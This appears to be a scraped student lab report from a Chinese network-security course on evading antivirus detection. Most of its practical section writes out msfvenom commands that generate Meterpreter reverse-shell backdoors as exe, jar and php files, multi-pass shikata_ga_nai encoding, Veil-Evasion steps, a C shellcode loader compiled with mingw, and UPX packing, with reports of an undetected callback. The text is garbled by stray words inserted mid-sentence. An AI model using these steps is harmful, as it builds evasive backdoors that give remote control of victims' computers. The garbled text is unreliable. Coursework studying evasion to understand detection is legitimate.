2018-2019-2 網絡對抗技術 20165237 Exp3 免殺原理與實踐
2018-2019-2 網絡對抗技術 20165237 Exp3 免殺原理與實踐
1、實踐目標
1.1 正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,加殼工具,使用shellcode編程php
1.2 經過組合應用各類技術實現惡意代碼免殺java
1.3 用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(由於Win10的自帶實時監控殺毒牆,一運行文件就自動刪除,因此沒有作這個加分項)linux
2、基礎知識
- 免殺
通常是對惡意軟件作處理,讓它不被殺毒軟件所檢測。也是滲透測試中須要使用到的技術。
要作好免殺,就時清楚殺毒軟件(惡意軟件檢測工具)是如何工做的。AV(Anti-virus)是很大一個產業。其中主要的技術人員基本有編制惡意軟件的經驗。shell
反過來也同樣,瞭解了免殺的工具和技術,你也就具備了反制它的基礎。編程
3、Exp3.1 正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,本身利用shellcode編程等免殺工具或技巧
實驗步驟:
- 正確使用msf編碼器,生成exe文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe >fenix.exe
使用virscan進行掃描,結果以下所示:
windows使用msf編碼器對後門程序編碼10次
安全
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe > met-encoded.exe
上傳到virus total試試免殺操做是否有效
網絡使用Java後門程序生成命令tcp
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.137.1 lport=5237 x> 20165237_backdoor_java.jar
- 使用php後門程序生成命令
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.153.135 lport=443 x> 20165237_backdoor.php
- 使用veil
use evasion use 7 set Lhost 192.168.153.135 set Lport 5237
而後再輸入後門程序的文件名:payload5237
工具用virscan看看查殺表現:
4、Exp3.2Linux平臺交叉編譯Windows應用
實驗原理
- 執行shellcode生成命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.135 LPORT=5237 -f c
- 新建20165237.c文件,而且將下列代碼輸入:
unsigned char buf[] =
此處省略。
int main()
{
int (*func)() = (int(*)())buf;
func();
}
- 使用命令:
i686-w64-mingw32-g++ 20165237.c -o 20165237.exe
編譯這個.c文件爲可執行文件;
檢測結果:
- 而後把它掛上virus total測一下:
- 加壓縮殼:
upx 20165237.exe -o 20165237plus.exe
使用殺軟掃描桌面文件,沒有報警
運行後門程序,反彈鏈接成功
(因爲Win10自帶的windows defendedr有強制實時監測,因此當點開惡意程序時直接被刪除,致使沒法回連。。想加分都加不了)
5、實驗感想與問題
一、殺軟是如何檢測出惡意代碼的?
答:基於特徵碼:殺軟會將惡意代碼中有明顯特徵的一部分做爲特徵碼,並創建起特徵庫,在檢測時則比對特徵碼是否匹配。
基於行爲:殺軟會監控運行的程序,像進行修改系統註冊表、啓動項等可疑操做的的程序就多是惡意代碼。- 二、免殺是作什麼?
答:讓後門程序不被殺軟檢測出來 - 三、免殺的基本方法有哪些?
答:msfvenom直接生成、msfvenom屢次編碼、Veil-evasion、C+shellcode、UPX壓縮殼、Hyperion 感想: 答:此次實驗讓我感覺到其實殺毒軟件只能殺很常規的病毒或者惡意程序,雖然病毒庫在持續更新,可是總會有未被查出的惡意軟件或者惡意代碼進入到本身的計算機,有一天破壞電腦數據。因此之後必定要注意安全上網,不要訪問非法網站或者點開非法鏈接,說不定點開就會致使惡意軟件的啓動,從而被盜取計算機中的信息!
- 1. 20155207 《網絡對抗技術》EXP3 免殺原理與實踐
- 2. 20145215《網絡對抗》Exp3 免殺原理與實踐
- 3. 20145307陳俊達《網絡對抗》Exp3 免殺原理與實踐
- 4. 20154307《網絡對抗》Exp3 免殺原理與實踐
- 5. 20155333 《網絡對抗》Exp3 免殺原理與實踐
- 6. 20155218《網絡對抗》Exp3 免殺原理與實踐
- 7. 2017-2018-2 20155303 『網絡對抗技術』Exp3:免殺原理與實踐
- 8. 2018-2019-2 《網絡對抗技術》Exp3 免殺原理與實踐 20165211
- 9. 2017-2018-4 20155203《網絡對抗技術》Exp3 免殺原理與實踐
- 10. 2018-2019-2 20165234 《網絡對抗技術》 Exp3 免殺原理與實踐
- 更多相關文章...
- • 網站主機 技術 - 網站主機教程
- • XML 相關技術 - XML 教程
- • ☆技術問答集錦(13)Java Instrument原理
- • Java Agent入門實戰(三)-JVM Attach原理與使用
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 安裝cuda+cuDNN
- 2. GitHub的使用說明
- 3. phpDocumentor使用教程【安裝PHPDocumentor】
- 4. yarn run build報錯Component is not found in path 「npm/taro-ui/dist/weapp/components/rate/index「
- 5. 精講Haproxy搭建Web集羣
- 6. 安全測試基礎之MySQL
- 7. C/C++編程筆記:C語言中的複雜聲明分析,用實例帶你完全讀懂
- 8. Python3教程(1)----搭建Python環境
- 9. 李宏毅機器學習課程筆記2:Classification、Logistic Regression、Brief Introduction of Deep Learning
- 10. 阿里雲ECS配置速記
- 1. 20155207 《網絡對抗技術》EXP3 免殺原理與實踐
- 2. 20145215《網絡對抗》Exp3 免殺原理與實踐
- 3. 20145307陳俊達《網絡對抗》Exp3 免殺原理與實踐
- 4. 20154307《網絡對抗》Exp3 免殺原理與實踐
- 5. 20155333 《網絡對抗》Exp3 免殺原理與實踐
- 6. 20155218《網絡對抗》Exp3 免殺原理與實踐
- 7. 2017-2018-2 20155303 『網絡對抗技術』Exp3:免殺原理與實踐
- 8. 2018-2019-2 《網絡對抗技術》Exp3 免殺原理與實踐 20165211
- 9. 2017-2018-4 20155203《網絡對抗技術》Exp3 免殺原理與實踐
- 10. 2018-2019-2 20165234 《網絡對抗技術》 Exp3 免殺原理與實踐